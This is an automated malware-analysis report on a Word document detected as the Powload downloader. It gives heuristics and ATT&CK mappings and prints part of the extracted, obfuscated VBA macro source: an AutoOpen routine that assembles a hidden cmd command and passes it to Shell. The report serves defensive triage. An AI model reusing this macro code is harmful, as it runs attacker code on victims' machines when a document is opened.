MALICIOUS (Risk Score: 202)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. The macro calls the Shell function, a critical indicator of malicious activity, most likely to download and execute a second-stage payload. The command string built for the Shell call is heavily obfuscated, so the exact command line or URL cannot be reconstructed, but the intent to execute arbitrary code is clear.
Heuristics (6)
- ClamAV: Doc.Malware.Powload-6691557-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Powload-6691557-0
- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16777 bytes |

SHA-256 of macros.bas: 9f3491858116b14fb2b15ad1c7b4452b1b3592ee95dcb8ef140b4da676196592
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "sKtmqDsoHSVl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName 6
TypeName 8917
TypeName 375
TypeName CCur(niSOQp)
TypeName Sin(78661 * icJmG)
Shell# KeyString(MmVwuYlj + PzMiRjJzDr + vbKeyC + FzPowDZniQNYb + jSQNNapIO) + UzisKFdXjXjFb + RpzmoHbR + BFDzi + sFFzRMilinz + RSWtmhL + AjbRSlNILW + BJMRbcBsdwL + KVDOubbWJ + iriaGT + JQcsUqVPDZD + jKFBUUbKqO + MwiMnaRj + HuCpwqkcU + jWSEJHXz + JrAMofE + JcKitfBMXbLJPh, 764019835 - 764019835
TypeName Month(ERacTw - OFRjYd / 47825 - wIajjj)
TypeName VzhIC
TypeName Rnd(984)
End Sub
Attribute VB_Name = "JVvTjWBwQzQdbF"
Function BFDzi()
On Error Resume Next
TypeName CDate(jfODi)
TypeName 780
IIILsHVzjdW = "m" + "d" + " /" + "V:" + "O"
TypeName kqUjUP
TypeName Fix(hPopzY / cjCaZd)
zwiwGlzi = "N " + " " + " /" + CStr(Chr(zcddWXCYkhp + zprUkZBKM + 67 + awoQohuUPrcKWo + qjozTuJOJd)) + " " + " " + " " + CStr(Chr(UnSmciDaimk + VIYViUjzFLbX + 34 + fnaGKsQzcZq + kKlEwmKwmktfI)) + " " + " s" + "et" + " " + " A"
TypeName Str(64377 - CijfV + wWRLq * XwZNwM)
TypeName iGVav
TypeName 106121698
cqoRLoPPzD = "V1=" + "KfI" + "i" + CStr(Chr(PbqOZwYmIfZ + VfzfvbvpUH + 99 + rhtChbCjmkAi + uMXcYZcp)) + "W" + "mFt" + "FR" + "mw" + "MvP" + "H" + "nV" + "p1"
TypeName NZYnS
TypeName Sqr(JLOrS)
TypeName 7
pwWkSwTPTiE = CStr(Chr(lOjhNou + diQikbEXb + 67 + fQDmhiRriCJC + QSrUVzpfTwadh)) + "rJ" + "k" + "he;" + "U)" + "/s:"
TypeName CStr(rMEBL)
TypeName (SwsUcL)
tYAiXQUPR = "o" + "7" + "y" + "u" + "Y"
TypeName Tan(7040)
TypeName 957
pGUkXwji = "@4" + "zd" + "S" + "2A" + "x" + "-" + "+Z" + "=bN" + "j" + "8}D"
TypeName CDbl(36)
TypeName 8595500
TypeName SzFjsE
MLoXbJ = "(\" + "'" + "." + CStr(Chr(UCAFrbV + zfWDmMTfMrTIMC + 108 + vzzFMEAiqOAI + LvIuVqam)) + "{E$" + " " + ","
TypeName TypeName(620)
TypeName 817
LGVqzZf = "ag&" + "& " + " f" + "or" + " %k" + " " + " in"
TypeName Sgn(SjijrF + bFqZzE / EkBoNd / 52010)
TypeName CLng(8)
TypeName 2487
hpCvHMui = " " + " " + "( 1" + "9 " + "3" + "3 " + " " + " " + "12" + " 26" + " " + "2" + "2"
TypeName 4
TypeName CCur(CpSisV)
TypeName CCur(13376 * 88254)
RakKnSi = " 3" + "1" + " " + "25" + " " + " "
BFDzi = IIILsHVzjdW + zwiwGlzi + cqoRLoPPzD + pwWkSwTPTiE + tYAiXQUPR + pGUkXwji + MLoXbJ + LGVqzZf + hpCvHMui + RakKnSi
TypeName 40
TypeName 273350357
TypeName TypeName(WKNGfi)
End Function
Function sFFzRMilinz()
On Error Resume Next
TypeName kFpYS
TypeName TimeValue(bMiwnd)
aZJQjLjbE = " " + " 2" + "6" + " 6" + "0 " + " " + "60" + " 64" + " " + " 6" + "3 "
TypeName WFjsYc
TypeName CStr(5)
fljJHwCiUcr = " " + "5 " + " " + "50 " + " " + " " + " 4" + "0 " + " " + "49 "
TypeName Tan(1)
TypeName Chr(3)
bQvJqdKu = "1" + "7 " + " " + "26" + " " + " 1" + "2 " + " " + "46" + " 33" + " "
TypeName 323977597
TypeName LCase(53067 + VzMhwz / tQJfQ - 31853)
BCiMiAURS = "5" + "0 " + "5" + "2" + " " + " 2"
TypeName jlGvDb
TypeName CLng(139999472)
TypeName Int(oSwDRC / YMcaQC + 23521 + zYNzb)
dqUkYMwhYhH = "6" + " " + " 4 " + " " + " 8"
TypeName 50
TypeName TypeName(YihUf)
vmWjlbvjF = " " + "64 " + " 5" + "1 " + " 26" + " " + "8 " + "59 " + "5 " + " 2" + "6"
TypeName 6
TypeName 8071
pcXUQWb = " " + "50 " + " " + " " + " 2" + "1 " + " " + " " + "60" + " 3" + " 2" + "6 " + "17"
sFFzRMilinz = aZJQjLjbE + fljJHwCiUcr + bQvJqdKu + BCiMiAURS + dqUkYMwhYhH + vmWjlbvjF + pcXUQWb
TypeName 53
TypeName 1592
End Function
Function RSWtmhL()
On Error Resume Next
TypeName CInt(6)
TypeName Log(zdQsQ)
wzwEhviRYCz = " " + "8" + " 2" + "7 " + "63 "
TypeName CSng(3)
TypeName 9725
TypeName Sqr(cNRLG)
BXWJERk = "4" + "0 " + " " + "62 " + "41" + " 4" + "9" + " 5" + "8" + " 25" + " 8"
TypeName TiiUmJ
TypeName CDa
... (truncated)